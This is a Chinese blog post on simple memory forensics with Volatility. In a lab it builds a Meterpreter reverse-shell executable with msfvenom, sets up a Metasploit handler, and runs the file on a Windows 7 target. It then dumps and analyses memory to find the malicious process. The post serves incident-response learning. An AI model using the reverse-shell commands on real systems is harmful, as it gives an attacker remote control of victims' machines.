使用Volatility进行简单的内存分析

admin 2021年5月10日01:26:55评论73 views字数 930阅读3分6秒阅读模式

Volatility下载地址
https://www.volatilityfoundation.org/releases
Dumplt下载地址
http://www.secist.com/wp-content/uploads/2016/11/DumpIt.zip
因为一次应急响应,大佬针对受害主机内存进行了详细的分析,所以我就萌生了浮现一遍分析过程的想法。
攻击机IP地址192.168.234.140(kali)
靶机IP地址 192.168.234.141(win7)
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.234.140 lport=4433 -f exe -o shell.exe
首先生成一个恶意反连文件

使用Volatility进行简单的内存分析
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.234.140
set LPORT 4433
exploit

使用Volatility进行简单的内存分析
这时候需要将恶意文件拷贝到靶机中运行
然后使用dumplt 生成.raw文件(这里内存有多大生成的文件就有多大)

使用Volatility进行简单的内存分析
接下来就是使用Volatility针对该文件进行分析
(PS:不是我不用kali是里面的装不好)

使用Volatility进行简单的内存分析
使用imageinfo识别应该使用的配置文件
识别出来的Win7SP1x64符合靶机情况

使用Volatility进行简单的内存分析
使用netscan查看内存中进程的网络连接情况

使用Volatility进行简单的内存分析
进程号2864有明显的外连行为
使用procdump对该进程dump

使用Volatility进行简单的内存分析
刚dump一瞬间就触发了windows defender告警
将文件放到https://www.virustotal.com/上识别

使用Volatility进行简单的内存分析
将文件使用IDA分析

使用Volatility进行简单的内存分析
这就完成了简单的内存分析,我只是个小菜鸟,希望以后每次应急都有新的收获。
PS:再提一下使用ms17-010正在进行攻击的时候内存dump是检查不到恶意进程的

相关推荐: Wordpress 插件命令执行

环境搭建 利用 phpstudy 搭建 wordpress ,http://wordpress.test/wp-admin/plugin-install.php 将解压一次后的漏洞插件压缩包上传并启用插件。 File Manager插件6.0版本 漏洞利用 这…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年5月10日01:26:55
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   使用Volatility进行简单的内存分析https://cn-sec.com/archives/246442.html